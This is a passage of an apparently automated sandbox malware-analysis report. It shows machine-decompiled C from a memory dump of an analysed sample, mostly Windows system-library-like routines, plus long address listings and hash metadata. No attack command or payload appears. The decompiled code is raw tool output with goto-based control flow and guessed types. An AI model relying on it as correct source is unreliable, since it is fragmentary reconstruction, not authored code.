                                                                                                                                                                            							_t267 = _v20;
                                                                                                                                                                            							L21:
                                                                                                                                                                            							_t336 = _v28;
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								_t362 =  *_t362;
                                                                                                                                                                            								if((_t362 & 0x00000001) != 0) {
                                                                                                                                                                            									break;
                                                                                                                                                                            								}
                                                                                                                                                                            								if(_t267 == ( *(_t362 + 4) & _t336)) {
                                                                                                                                                                            									L26:
                                                                                                                                                                            									if(_t362 == 0) {
                                                                                                                                                                            										goto L34;
                                                                                                                                                                            									}
                                                                                                                                                                            									_t149 = E1D8FACB2(_t362, _v12);
                                                                                                                                                                            									if(_t149 != 0) {
                                                                                                                                                                            										goto L30;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L18;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							_t362 = 0;
                                                                                                                                                                            							goto L26;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_t368 = _t361 - 1;
                                                                                                                                                                            					if(_t368 == 0) {
                                                                                                                                                                            						L15:
                                                                                                                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                                                                                                                            						_t374 =  &(_t374[1]);
                                                                                                                                                                            						goto L16;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t369 = _t368 - 1;
                                                                                                                                                                            					if(_t369 == 0) {
                                                                                                                                                                            						L14:
                                                                                                                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                                                                                                                            						_t374 =  &(_t374[1]);
                                                                                                                                                                            						goto L15;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t370 = _t369 - 1;
                                                                                                                                                                            					if(_t370 == 0) {
                                                                                                                                                                            						L13:
                                                                                                                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                                                                                                                            						_t374 =  &(_t374[1]);
                                                                                                                                                                            						goto L14;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t371 = _t370 - 1;
                                                                                                                                                                            					if(_t371 == 0) {
                                                                                                                                                                            						L12:
                                                                                                                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                                                                                                                            						_t374 =  &(_t374[1]);
                                                                                                                                                                            						goto L13;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t372 = _t371 - 1;
                                                                                                                                                                            					if(_t372 == 0) {
                                                                                                                                                                            						L11:
                                                                                                                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                                                                                                                            						_t374 =  &(_t374[1]);
                                                                                                                                                                            						goto L12;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t372 != 1) {
                                                                                                                                                                            						goto L17;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t251 = _t251 * 0x25 + ( *_t374 & 0x000000ff);
                                                                                                                                                                            						_t374 =  &(_t374[1]);
                                                                                                                                                                            						goto L11;
                                                                                                                                                                            					}
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t358 = _t360 >> 3;
                                                                                                                                                                            					_t360 = _t360 + _t358 * 0xfffffff8;
                                                                                                                                                                            					do {
                                                                                                                                                                            						_t333 = ((((((_t374[1] & 0x000000ff) * 0x25 + (_t374[2] & 0x000000ff)) * 0x25 + (_t374[3] & 0x000000ff)) * 0x25 + (_t374[4] & 0x000000ff)) * 0x25 + (_t374[5] & 0x000000ff)) * 0x25 + (_t374[6] & 0x000000ff)) * 0x25 - _t251 * 0x2fe8ed1f;
                                                                                                                                                                            						_t261 = ( *_t374 & 0x000000ff) * 0x1a617d0d;
                                                                                                                                                                            						_t250 = _t374[7] & 0x000000ff;
                                                                                                                                                                            						_t374 =  &(_t374[8]);
                                                                                                                                                                            						_t251 = _t261 + _t333 + _t250;
                                                                                                                                                                            						_t358 = _t358 - 1;
                                                                                                                                                                            					} while (_t358 != 0);
                                                                                                                                                                            					goto L3;
                                                                                                                                                                            				}
                                                                                                                                                                            			}












































































                                                                                                                                                                            0x1d8facf4
                                                                                                                                                                            0x1d8facf6
                                                                                                                                                                            0x1d8facfb
                                                                                                                                                                            0x1d8facfe
                                                                                                                                                                            0x1d8fad05
                                                                                                                                                                            0x1d8fad05
                                                                                                                                                                            0x1d8fad08
                                                                                                                                                                            0x1d8fad0e
                                                                                                                                                                            0x1d8fad6f
                                                                                                                                                                            0x1d8fad6f
                                                                                                                                                                            0x1d8fad72
                                                                                                                                                                            0x1d8fadc8
                                                                                                                                                                            0x1d8fadce
                                                                                                                                                                            0x1d8fadd0
                                                                                                                                                                            0x1d8fadd0
                                                                                                                                                                            0x1d8fadd3
                                                                                                                                                                            0x1d8fadd7
                                                                                                                                                                            0x1d8fadda
                                                                                                                                                                            0x1d8faddf
                                                                                                                                                                            0x1d8fade1
                                                                                                                                                                            0x1d8fade1
                                                                                                                                                                            0x1d8fade1
                                                                                                                                                                            0x1d8fade1
                                                                                                                                                                            0x1d8fadec
                                                                                                                                                                            0x1d8fadf0
                                                                                                                                                                            0x1d8fadf2
                                                                                                                                                                            0x1d8fadf5
                                                                                                                                                                            0x1d8fadf8
                                                                                                                                                                            0x1d8fadfd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fadff
                                                                                                                                                                            0x1d8fae04
                                                                                                                                                                            0x1d8fae69
                                                                                                                                                                            0x1d8fae6b
                                                                                                                                                                            0x1d8fae6d
                                                                                                                                                                            0x1d8fae8b
                                                                                                                                                                            0x1d8fae8b
                                                                                                                                                                            0x1d8fae8f
                                                                                                                                                                            0x1d8fae97
                                                                                                                                                                            0x1d8fae9a
                                                                                                                                                                            0x1d8faea9
                                                                                                                                                                            0x1d8faeb1
                                                                                                                                                                            0x1d8faeb3
                                                                                                                                                                            0x1d8faeb8
                                                                                                                                                                            0x1d8faec8
                                                                                                                                                                            0x1d8faec9
                                                                                                                                                                            0x1d8faeca
                                                                                                                                                                            0x1d8faed6
                                                                                                                                                                            0x1d8faedb
                                                                                                                                                                            0x1d8faede
                                                                                                                                                                            0x1d8faeea
                                                                                                                                                                            0x1d8faef9
                                                                                                                                                                            0x1d8faefe
                                                                                                                                                                            0x1d8faf01
                                                                                                                                                                            0x1d8faf03
                                                                                                                                                                            0x1d8faf03
                                                                                                                                                                            0x1d8faf03
                                                                                                                                                                            0x1d8faf0e
                                                                                                                                                                            0x1d8faf12
                                                                                                                                                                            0x1d8faf15
                                                                                                                                                                            0x1d8faf17
                                                                                                                                                                            0x1d8faf1a
                                                                                                                                                                            0x1d8faf1f
                                                                                                                                                                            0x1d8faf5b
                                                                                                                                                                            0x1d8faf5b
                                                                                                                                                                            0x1d8faf5e
                                                                                                                                                                            0x1d8faf5e
                                                                                                                                                                            0x1d8faf66
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8faf6f
                                                                                                                                                                            0x1d8faf75
                                                                                                                                                                            0x1d8faf77
                                                                                                                                                                            0x1d8fafae
                                                                                                                                                                            0x1d8fafae
                                                                                                                                                                            0x1d8fafb0
                                                                                                                                                                            0x1d8fafb3
                                                                                                                                                                            0x1d8fafb3
                                                                                                                                                                            0x1d8fafb6
                                                                                                                                                                            0x1d8fafb6
                                                                                                                                                                            0x1d8fafb9
                                                                                                                                                                            0x1d8fafbc
                                                                                                                                                                            0x1d8fafbf
                                                                                                                                                                            0x1d8fafc4
                                                                                                                                                                            0x1d8fafcc
                                                                                                                                                                            0x1d8fb11b
                                                                                                                                                                            0x1d8fb128
                                                                                                                                                                            0x1d8fb12d
                                                                                                                                                                            0x1d8fb12f
                                                                                                                                                                            0x1d8fb132
                                                                                                                                                                            0x1d8fb135
                                                                                                                                                                            0x1d8fb15e
                                                                                                                                                                            0x1d8fb160
                                                                                                                                                                            0x1d8fb160
                                                                                                                                                                            0x1d8fb166
                                                                                                                                                                            0x1d8fb168
                                                                                                                                                                            0x1d8fb16b
                                                                                                                                                                            0x1d8fb16d
                                                                                                                                                                            0x1d8fb16f
                                                                                                                                                                            0x1d8fb16f
                                                                                                                                                                            0x1d8fb173
                                                                                                                                                                            0x1d8fb17a
                                                                                                                                                                            0x1d8fb17c
                                                                                                                                                                            0x1d8fb180
                                                                                                                                                                            0x1d8fb185
                                                                                                                                                                            0x1d8fb18b
                                                                                                                                                                            0x1d8fb18b
                                                                                                                                                                            0x1d8fb18d
                                                                                                                                                                            0x1d8fb193
                                                                                                                                                                            0x1d8fb193
                                                                                                                                                                            0x1d8fafd4
                                                                                                                                                                            0x1d8fafdc
                                                                                                                                                                            0x1d8fafe3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fafe9
                                                                                                                                                                            0x1d8fafef
                                                                                                                                                                            0x1d8faff3
                                                                                                                                                                            0x1d8faff3
                                                                                                                                                                            0x1d8fafff
                                                                                                                                                                            0x1d8fb005
                                                                                                                                                                            0x1d8fb007
                                                                                                                                                                            0x1d8fb009
                                                                                                                                                                            0x1d8fb00e
                                                                                                                                                                            0x1d8fb194
                                                                                                                                                                            0x1d8fb194
                                                                                                                                                                            0x1d8fb19a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fb1a0
                                                                                                                                                                            0x1d8fb1a3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fb014
                                                                                                                                                                            0x1d8fb014
                                                                                                                                                                            0x1d8fb014
                                                                                                                                                                            0x1d8fb019
                                                                                                                                                                            0x1d8fb02c
                                                                                                                                                                            0x1d8fb033
                                                                                                                                                                            0x1d8fb035
                                                                                                                                                                            0x1d8fb035
                                                                                                                                                                            0x1d8fb03a
                                                                                                                                                                            0x1d8fb03c
                                                                                                                                                                            0x1d8fb049
                                                                                                                                                                            0x1d8fb052
                                                                                                                                                                            0x1d8fb056
                                                                                                                                                                            0x1d8fb058
                                                                                                                                                                            0x1d8fb067
                                                                                                                                                                            0x1d8fb067
                                                                                                                                                                            0x1d8fb070
                                                                                                                                                                            0x1d8fb07b
                                                                                                                                                                            0x1d8fb07e
                                                                                                                                                                            0x1d8fb0ec
                                                                                                                                                                            0x1d8fb0ec
                                                                                                                                                                            0x1d8fb0ec
                                                                                                                                                                            0x1d8fb0f2
                                                                                                                                                                            0x1d8fb0f5
                                                                                                                                                                            0x1d8fb0fb
                                                                                                                                                                            0x1d8fb0fe
                                                                                                                                                                            0x1d8fb100
                                                                                                                                                                            0x1d8fb105
                                                                                                                                                                            0x1d8fb110
                                                                                                                                                                            0x1d8fb116
                                                                                                                                                                            0x1d8fb118
                                                                                                                                                                            0x1d8fb118
                                                                                                                                                                            0x1d8fb118
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fb080
                                                                                                                                                                            0x1d8fb080
                                                                                                                                                                            0x1d8fb080
                                                                                                                                                                            0x1d8fb080
                                                                                                                                                                            0x1d8fb083
                                                                                                                                                                            0x1d8fb086
                                                                                                                                                                            0x1d8fb086
                                                                                                                                                                            0x1d8fb089
                                                                                                                                                                            0x1d8fb092
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fb096
                                                                                                                                                                            0x1d8fb09c
                                                                                                                                                                            0x1d8fb0a7
                                                                                                                                                                            0x1d8fb0b0
                                                                                                                                                                            0x1d8fb0ca
                                                                                                                                                                            0x1d8fb0cc
                                                                                                                                                                            0x1d8fb0d2
                                                                                                                                                                            0x1d8fb0d6
                                                                                                                                                                            0x1d8fb0d9
                                                                                                                                                                            0x1d8fb0d9
                                                                                                                                                                            0x1d8fb0de
                                                                                                                                                                            0x1d8fb0de
                                                                                                                                                                            0x1d8fb0e1
                                                                                                                                                                            0x1d8fb0e2
                                                                                                                                                                            0x1d8fb0e8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fb05a
                                                                                                                                                                            0x1d8fb05a
                                                                                                                                                                            0x1d8fb05d
                                                                                                                                                                            0x1d8fb05d
                                                                                                                                                                            0x1d8fb05e
                                                                                                                                                                            0x1d8fb060
                                                                                                                                                                            0x1d8fb063
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fb05d
                                                                                                                                                                            0x1d8fb058
                                                                                                                                                                            0x1d8fb01b
                                                                                                                                                                            0x1d8fb020
                                                                                                                                                                            0x1d8fb027
                                                                                                                                                                            0x1d8fb02a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fb022
                                                                                                                                                                            0x1d8fb022
                                                                                                                                                                            0x1d8fb022
                                                                                                                                                                            0x1d8fb023
                                                                                                                                                                            0x1d8fb023
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fb022
                                                                                                                                                                            0x1d8fb00e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8faf77
                                                                                                                                                                            0x1d8faf71
                                                                                                                                                                            0x1d8faf73
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8faf73
                                                                                                                                                                            0x1d8faf21
                                                                                                                                                                            0x1d8faf26
                                                                                                                                                                            0x1d8faf8c
                                                                                                                                                                            0x1d8faf8e
                                                                                                                                                                            0x1d8faf90
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8faf92
                                                                                                                                                                            0x1d8faf95
                                                                                                                                                                            0x1d8faf9a
                                                                                                                                                                            0x1d8faf9c
                                                                                                                                                                            0x1d8fafa1
                                                                                                                                                                            0x1d8fafa7
                                                                                                                                                                            0x1d8fafa7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fafa1
                                                                                                                                                                            0x1d8faf4d
                                                                                                                                                                            0x1d8faf52
                                                                                                                                                                            0x1d8faf55
                                                                                                                                                                            0x1d8faf58
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8faf79
                                                                                                                                                                            0x1d8faf7d
                                                                                                                                                                            0x1d8faf82
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8faf8a
                                                                                                                                                                            0x1d8faeba
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8faeba
                                                                                                                                                                            0x1d8fae6f
                                                                                                                                                                            0x1d8fae6f
                                                                                                                                                                            0x1d8fae79
                                                                                                                                                                            0x1d8fae7b
                                                                                                                                                                            0x1d8fae7b
                                                                                                                                                                            0x1d8fae81
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fae81
                                                                                                                                                                            0x1d8fae2b
                                                                                                                                                                            0x1d8fae30
                                                                                                                                                                            0x1d8fae33
                                                                                                                                                                            0x1d8fae36
                                                                                                                                                                            0x1d8fae39
                                                                                                                                                                            0x1d8fae39
                                                                                                                                                                            0x1d8fae3c
                                                                                                                                                                            0x1d8fae3c
                                                                                                                                                                            0x1d8fae44
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fae4d
                                                                                                                                                                            0x1d8fae53
                                                                                                                                                                            0x1d8fae55
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fae5b
                                                                                                                                                                            0x1d8fae62
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fae64
                                                                                                                                                                            0x1d8fae4f
                                                                                                                                                                            0x1d8fae51
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fae51
                                                                                                                                                                            0x1d8fade1
                                                                                                                                                                            0x1d8fad74
                                                                                                                                                                            0x1d8fad77
                                                                                                                                                                            0x1d8fadbf
                                                                                                                                                                            0x1d8fadc5
                                                                                                                                                                            0x1d8fadc7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fadc7
                                                                                                                                                                            0x1d8fad79
                                                                                                                                                                            0x1d8fad7c
                                                                                                                                                                            0x1d8fadb6
                                                                                                                                                                            0x1d8fadbc
                                                                                                                                                                            0x1d8fadbe
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fadbe
                                                                                                                                                                            0x1d8fad7e
                                                                                                                                                                            0x1d8fad81
                                                                                                                                                                            0x1d8fadad
                                                                                                                                                                            0x1d8fadb3
                                                                                                                                                                            0x1d8fadb5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fadb5
                                                                                                                                                                            0x1d8fad83
                                                                                                                                                                            0x1d8fad86
                                                                                                                                                                            0x1d8fada4
                                                                                                                                                                            0x1d8fadaa
                                                                                                                                                                            0x1d8fadac
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fadac
                                                                                                                                                                            0x1d8fad88
                                                                                                                                                                            0x1d8fad8b
                                                                                                                                                                            0x1d8fad9b
                                                                                                                                                                            0x1d8fada1
                                                                                                                                                                            0x1d8fada3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fada3
                                                                                                                                                                            0x1d8fad90
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fad92
                                                                                                                                                                            0x1d8fad98
                                                                                                                                                                            0x1d8fad9a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fad9a
                                                                                                                                                                            0x1d8fad10
                                                                                                                                                                            0x1d8fad12
                                                                                                                                                                            0x1d8fad18
                                                                                                                                                                            0x1d8fad1a
                                                                                                                                                                            0x1d8fad54
                                                                                                                                                                            0x1d8fad59
                                                                                                                                                                            0x1d8fad5f
                                                                                                                                                                            0x1d8fad63
                                                                                                                                                                            0x1d8fad68
                                                                                                                                                                            0x1d8fad6a
                                                                                                                                                                            0x1d8fad6a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1d8fad1a

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 0000000B.00000002.1344068848.000000001D7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7F0000, based on PE: true
                                                                                                                                                                            • Associated: 0000000B.00000002.1346656449.000000001D919000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            • Associated: 0000000B.00000002.1346687966.000000001D91D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d7f0000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DebugPrintTimes
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3446177414-0
                                                                                                                                                                            • Opcode ID: e50da09ea86230702ba9a076c3e06d8e84fc0527690c1b3b8c11c5c133dd084e
                                                                                                                                                                            • Instruction ID: 5b08394df881c2159fcfce103084a180c86b51410c78a059c4db9e0f8fdff2fb
                                                                                                                                                                            • Opcode Fuzzy Hash: e50da09ea86230702ba9a076c3e06d8e84fc0527690c1b3b8c11c5c133dd084e
                                                                                                                                                                            • Instruction Fuzzy Hash: 64F1E772E006559FCB18CF68C99067EFBF6EF8821071A416DE466DB390E634EE41CB50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                            			E1D84EE48(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				intOrPtr _t196;
                                                                                                                                                                            				signed int _t201;
                                                                                                                                                                            				signed int _t202;
                                                                                                                                                                            				intOrPtr _t206;
                                                                                                                                                                            				signed int _t207;
                                                                                                                                                                            				intOrPtr _t209;
                                                                                                                                                                            				intOrPtr _t215;
                                                                                                                                                                            				signed int _t222;
                                                                                                                                                                            				signed int _t227;
                                                                                                                                                                            				signed int _t228;
                                                                                                                                                                            				signed int _t231;
                                                                                                                                                                            				signed int _t244;
                                                                                                                                                                            				signed int _t247;
                                                                                                                                                                            				char* _t250;
                                                                                                                                                                            				intOrPtr _t255;
                                                                                                                                                                            				signed int _t269;
                                                                                                                                                                            				signed int* _t270;
                                                                                                                                                                            				intOrPtr _t279;
                                                                                                                                                                            				signed char _t284;
                                                                                                                                                                            				signed int _t291;
                                                                                                                                                                            				signed int _t292;
                                                                                                                                                                            				intOrPtr _t301;
                                                                                                                                                                            				intOrPtr* _t307;
                                                                                                                                                                            				signed int _t308;
                                                                                                                                                                            				signed int _t309;
                                                                                                                                                                            				intOrPtr _t313;
                                                                                                                                                                            				intOrPtr _t314;
                                                                                                                                                                            				intOrPtr* _t316;
                                                                                                                                                                            				void* _t318;
                                                                                                                                                                            
                                                                                                                                                                            				_push(0x7c);
                                                                                                                                                                            				_push(0x1d8fc610);
                                                                                                                                                                            				E1D877C40(__ebx, __edi, __esi);
                                                                                                                                                                            				_t313 = __edx;
                                                                                                                                                                            				 *((intOrPtr*)(_t318 - 0x48)) = __edx;
                                                                                                                                                                            				 *((intOrPtr*)(_t318 - 0x20)) = __ecx;
                                                                                                                                                                            				 *(_t318 - 0x58) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t318 - 0x74)) = 0;
                                                                                                                                                                            				_t269 = 0;
                                                                                                                                                                            				 *(_t318 - 0x64) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t318 - 0x70)) =  *((intOrPtr*)(__ecx + 0x2c)) + __ecx;
                                                                                                                                                                            				_t196 = __edx + 0x28;
                                                                                                                                                                            				 *((intOrPtr*)(_t318 - 0x78)) = _t196;
                                                                                                                                                                            				 *((intOrPtr*)(_t318 - 0x84)) = _t196;
                                                                                                                                                                            				L1D832330(_t196, _t196);
                                                                                                                                                                            				_t314 =  *((intOrPtr*)(_t313 + 0x2c));
                                                                                                                                                                            				 *((intOrPtr*)(_t318 - 0x68)) = _t314;
                                                                                                                                                                            				L1:
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					if(_t314 ==  *((intOrPtr*)(_t318 - 0x48)) + 0x2c) {
                                                                                                                                                                            						E1D8324D0( *((intOrPtr*)(_t318 - 0x78)));
                                                                                                                                                                            						asm("sbb ebx, ebx");
                                                                                                                                                                            						 *[fs:0x0] =  *((intOrPtr*)(_t318 - 0x10));
                                                                                                                                                                            						return  ~_t269 & 0xc000022d;
                                                                                                                                                                            					}
                                                                                                                                                                            					 *((intOrPtr*)(_t318 - 0x54)) = _t314 - 4;
                                                                                                                                                                            					_t307 = 0x7ffe0010;
                                                                                                                                                                            					_t270 = 0x7ffe03b0;
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            					do {
                                                                                                                                                                            						do {
                                                                                                                                                                            							do {
                                                                                                                                                                            								do {
                                                                                                                                                                            									L4:
                                                                                                                                                                            									_t201 =  *0x1d9167f0; // 0x0
                                                                                                                                                                            									 *(_t318 - 0x30) = _t201;
                                                                                                                                                                            									_t202 =  *0x1d9167f4; // 0x0
                                                                                                                                                                            									 *(_t318 - 0x3c) = _t202;
                                                                                                                                                                            									 *(_t318 - 0x28) =  *_t270;
                                                                                                                                                                            									 *(_t318 - 0x5c) = _t270[1];
                                                                                                                                                                            									while(1) {
                                                                                                                                                                            										_t301 =  *0x7ffe000c;
                                                                                                                                                                            										_t279 =  *0x7ffe0008;
                                                                                                                                                                            										__eflags = _t301 -  *_t307;
                                                                                                                                                                            										if(_t301 ==  *_t307) {
                                                                                                                                                                            											goto L6;
                                                                                                                                                                            										}
                                                                                                                                                                            										asm("pause");
                                                                                                                                                                            									}
                                                                                                                                                                            									L6:
                                                                                                                                                                            									_t270 = 0x7ffe03b0;
                                                                                                                                                                            									_t308 =  *0x7ffe03b0;
                                                                                                                                                                            									 *(_t318 - 0x38) = _t308;
                                                                                                                                                                            									_t206 =  *0x7FFE03B4;
                                                                                                                                                                            									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
                                                                                                                                                                            									__eflags =  *(_t318 - 0x28) - _t308;
                                                                                                                                                                            									_t307 = 0x7ffe0010;
                                                                                                                                                                            								} while ( *(_t318 - 0x28) != _t308);
                                                                                                                                                                            								__eflags =  *(_t318 - 0x5c) - _t206;
                                                                                                                                                                            							} while ( *(_t318 - 0x5c) != _t206);
                                                                                                                                                                            							_t207 =  *0x1d9167f0; // 0x0
                                                                                                                                                                            							_t309 =  *0x1d9167f4; // 0x0
                                                                                                                                                                            							 *(_t318 - 0x28) = _t309;
                                                                                                                                                                            							__eflags =  *(_t318 - 0x30) - _t207;
                                                                                                                                                                            							_t307 = 0x7ffe0010;
                                                                                                                                                                            						} while ( *(_t318 - 0x30) != _t207);
                                                                                                                                                                            						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
                                                                                                                                                                            					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
                                                                                                                                                                            					_t316 =  *((intOrPtr*)(_t318 - 0x68));
                                                                                                                                                                            					_t269 =  *(_t318 - 0x64);
                                                                                                                                                                            					asm("sbb edx, [ebp-0x34]");
                                                                                                                                                                            					asm("sbb edx, eax");
                                                                                                                                                                            					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
                                                                                                                                                                            					asm("adc edx, edi");
                                                                                                                                                                            					asm("lock inc dword [esi+0x28]");
                                                                                                                                                                            					_t209 =  *((intOrPtr*)(_t318 - 0x20));
                                                                                                                                                                            					_t40 = _t209 + 0x18; // 0x17bf900
                                                                                                                                                                            					_t284 =  *(_t316 + 0x20) &  *_t40;
                                                                                                                                                                            					 *(_t318 - 0x38) = _t284;
                                                                                                                                                                            					__eflags =  *(_t316 + 0x30);
                                                                                                                                                                            					if( *(_t316 + 0x30) != 0) {
                                                                                                                                                                            						L37:
                                                                                                                                                                            						_t314 =  *_t316;
                                                                                                                                                                            						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
                                                                                                                                                                            						E1D84F24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
                                                                                                                                                                            						__eflags =  *(_t318 - 0x58);
                                                                                                                                                                            						if( *(_t318 - 0x58) != 0) {
                                                                                                                                                                            							 *0x1d9191e0( *((intOrPtr*)(_t318 - 0x74)));
                                                                                                                                                                            							 *(_t318 - 0x58)();
                                                                                                                                                                            						}
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t284;
                                                                                                                                                                            					if(_t284 == 0) {
                                                                                                                                                                            						goto L37;
                                                                                                                                                                            					}
                                                                                                                                                                            					 *(_t318 - 0x60) = _t284;
                                                                                                                                                                            					_t44 = _t318 - 0x60;
                                                                                                                                                                            					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
                                                                                                                                                                            					__eflags =  *_t44;
                                                                                                                                                                            					if( *_t44 == 0) {
                                                                                                                                                                            						L40:
                                                                                                                                                                            						__eflags = _t284 & 0xfffffffe;
                                                                                                                                                                            						if((_t284 & 0xfffffffe) != 0) {
                                                                                                                                                                            							__eflags =  *(_t316 + 0x60);
                                                                                                                                                                            							if( *(_t316 + 0x60) == 0) {
                                                                                                                                                                            								L14:
                                                                                                                                                                            								__eflags =  *(_t316 + 0x3c);
                                                                                                                                                                            								if( *(_t316 + 0x3c) != 0) {
                                                                                                                                                                            									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
                                                                                                                                                                            									if(__eflags > 0) {
                                                                                                                                                                            										goto L15;
                                                                                                                                                                            									}
                                                                                                                                                                            									if(__eflags < 0) {
                                                                                                                                                                            										L59:
                                                                                                                                                                            										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x17c04fc
                                                                                                                                                                            										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
                                                                                                                                                                            										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
                                                                                                                                                                            											goto L37;
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L15;
                                                                                                                                                                            									}
                                                                                                                                                                            									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
                                                                                                                                                                            									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
                                                                                                                                                                            										goto L15;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L59;
                                                                                                                                                                            								}
                                                                                                                                                                            								L15:
                                                                                                                                                                            								__eflags =  *(_t318 + 8);
                                                                                                                                                                            								if( *(_t318 + 8) != 0) {
                                                                                                                                                                            									__eflags =  *(_t316 + 0x54);
                                                                                                                                                                            									if( *(_t316 + 0x54) != 0) {
                                                                                                                                                                            										goto L16;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L37;
                                                                                                                                                                            								}
                                                                                                                                                                            								L16:
                                                                                                                                                                            								 *(_t318 - 0x24) = 0;
                                                                                                                                                                            								 *(_t318 - 0x30) = 0;
                                                                                                                                                                            								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
                                                                                                                                                                            								_t215 =  *((intOrPtr*)(_t316 + 8));
                                                                                                                                                                            								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
                                                                                                                                                                            								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
                                                                                                                                                                            								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
                                                                                                                                                                            								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
                                                                                                                                                                            								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
                                                                                                                                                                            								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
